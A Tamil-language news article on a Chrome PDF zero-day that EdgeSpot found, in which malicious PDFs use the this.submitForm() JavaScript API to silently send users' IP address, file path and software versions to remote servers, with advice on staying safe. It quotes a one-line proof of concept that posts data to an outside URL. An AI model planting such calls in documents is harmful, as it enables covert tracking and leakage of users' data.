சுரண்டல் கண்டறிதல் சேவை எட்ஜ்ஸ்பாட் PDF ஆவணங்களை சுரண்டுவதற்கான ஒரு புதிரான Chrome பூஜ்ஜிய நாள் பாதிப்பைக் கண்டறிந்தது. Chrome இல் திறக்கப்பட்ட தீங்கிழைக்கும் PDF ஆவணங்களைப் பயன்படுத்தி முக்கியமான தரவுகளை அறுவடை செய்ய தாக்குதல் செய்பவர்களை அனுமதிக்கிறது.

பாதிக்கப்பட்டவர் Google Chrome இல் அந்தந்த PDF கோப்புகளைத் திறந்தவுடன், தீங்கிழைக்கும் நிரல் பயனர் தரவைச் சேகரிப்பதன் மூலம் பின்னணியில் செயல்படத் தொடங்குகிறது.

தரவு பின்னர் ஹேக்கர்களால் கட்டுப்படுத்தப்படும் தொலை சேவையகத்திற்கு அனுப்பப்படுகிறது. தாக்குபவர்களால் என்ன தரவு உறிஞ்சப்படுகிறது என்று நீங்கள் யோசித்துக்கொண்டிருக்கலாம், அவை உங்கள் கணினியில் பின்வரும் தரவை குறிவைக்கின்றன:

• ஐபி முகவரி
• கணினியில் PDF கோப்பின் முழு பாதை
• OS மற்றும் Chrome பதிப்புகள்

தீம்பொருள் நிறைந்த PDF கோப்புகளை ஜாக்கிரதை

PDF கோப்புகளைத் திறக்க அடோப் ரீடர் பயன்படுத்தப்படும்போது எதுவும் நடக்காது என்பதை அறிந்து நீங்கள் ஆச்சரியப்படுவீர்கள். கூடுதலாக, எந்தவொரு பயனர் தலையீடும் இல்லாமல் தொலைநிலை சேவையகங்களுக்கு தரவை மாற்ற HTTP POST கோரிக்கைகள் பயன்படுத்தப்படுகின்றன.

Readnotifycom அல்லது burpcollaboratornet என்ற இரண்டு களங்களில் ஒன்று தரவைப் பெறுவதாக நிபுணர்கள் கண்டறிந்தனர்.

எட்ஜ்ஸ்பாட் கண்டுபிடித்த மாதிரிகளை பெரும்பாலான வைரஸ் தடுப்பு மென்பொருளால் கண்டுபிடிக்க முடியவில்லை என்ற உண்மையை கருத்தில் கொண்டு தாக்குதலின் தீவிரத்தை நீங்கள் கற்பனை செய்யலாம்.

பயனர்களின் முக்கிய தகவல்களை சேகரிக்க தாக்குதல் நடத்தியவர்கள் “this.submitForm ()” PDF ஜாவாஸ்கிரிப்ட் API ஐப் பயன்படுத்துகிறார்கள் என்று நிபுணர்கள் வெளிப்படுத்துகின்றனர்.

குறைந்தபட்ச PoC உடன் இதை சோதித்தோம், “this.submitForm ('http://google.com/test')” போன்ற எளிய API அழைப்பு Google Chrome தனிப்பட்ட தரவை google.com க்கு அனுப்ப வைக்கும்.

இந்த Chrome பிழை தீங்கிழைக்கும் PDF கோப்புகளின் இரண்டு தனித்தனி தொகுப்புகளால் சுரண்டப்படுவதாக வல்லுநர்கள் உண்மையில் கண்டுபிடித்தனர். இவை இரண்டும் முறையே அக்டோபர் 2017 மற்றும் செப்டம்பர் 2018 இல் விநியோகிக்கப்பட்டன.

சேகரிக்கப்பட்ட தரவுகள், எதிர்காலத்தில் தாக்குதல்களை நேர்த்தியாகப் பயன்படுத்த தாக்குபவர்களால் பயன்படுத்தப்படலாம். ReadNotify இன் PDF கண்காணிப்பு சேவையைப் பயன்படுத்தி முதல் தொகுதி கோப்புகள் தொகுக்கப்பட்டதாக அறிக்கைகள் தெரிவிக்கின்றன.

பயனர் பார்வைகளைக் கண்காணிக்க பயனர்கள் சேவையைப் பயன்படுத்தலாம். PDF கோப்புகளின் இரண்டாவது தொகுப்பின் தன்மை குறித்து எட்ஜ்ஸ்பாட் எந்த விவரங்களையும் பகிர்ந்து கொள்ளவில்லை.

பாதுகாப்பாக இருப்பது எப்படி

சுரண்டல் கண்டறிதல் சேவை எட்ஜ்ஸ்பாட் பயனர்கள் Chrome பயனர்களை சாத்தியமான அபாயங்கள் குறித்து எச்சரிக்க விரும்பியது, ஏனெனில் இணைப்பு எதிர்காலத்தில் வெளியிடப்படும் என்று எதிர்பார்க்கப்படவில்லை.

எட்ஜ்ஸ்பாட் கடந்த ஆண்டு பாதிப்பு குறித்து கூகிளுக்கு அறிக்கை அளித்தது, மேலும் ஏப்ரல் பிற்பகுதியில் ஒரு பேட்சை வெளியிடுவதாக நிறுவனம் உறுதியளித்தது. எச்

எவ்வாறாயினும், மாற்று PDF ரீடர் பயன்பாட்டைப் பயன்படுத்தி பெறப்பட்ட PDF ஆவணங்களை உள்ளூரில் பார்ப்பதன் மூலம் சிக்கலுக்கு ஒரு தற்காலிக தீர்வைப் பயன்படுத்துவதை நீங்கள் பரிசீலிக்கலாம்.

மாற்றாக, உங்கள் கணினிகளை இணையத்திலிருந்து துண்டிப்பதன் மூலம் உங்கள் PDF ஆவணங்களையும் Chrome இல் திறக்கலாம். இதற்கிடையில், ஏப்ரல் 23 அன்று வெளியிடப்படும் என்று எதிர்பார்க்கப்படும் Chrome 74 புதுப்பிப்புக்காக நீங்கள் காத்திருக்கலாம்.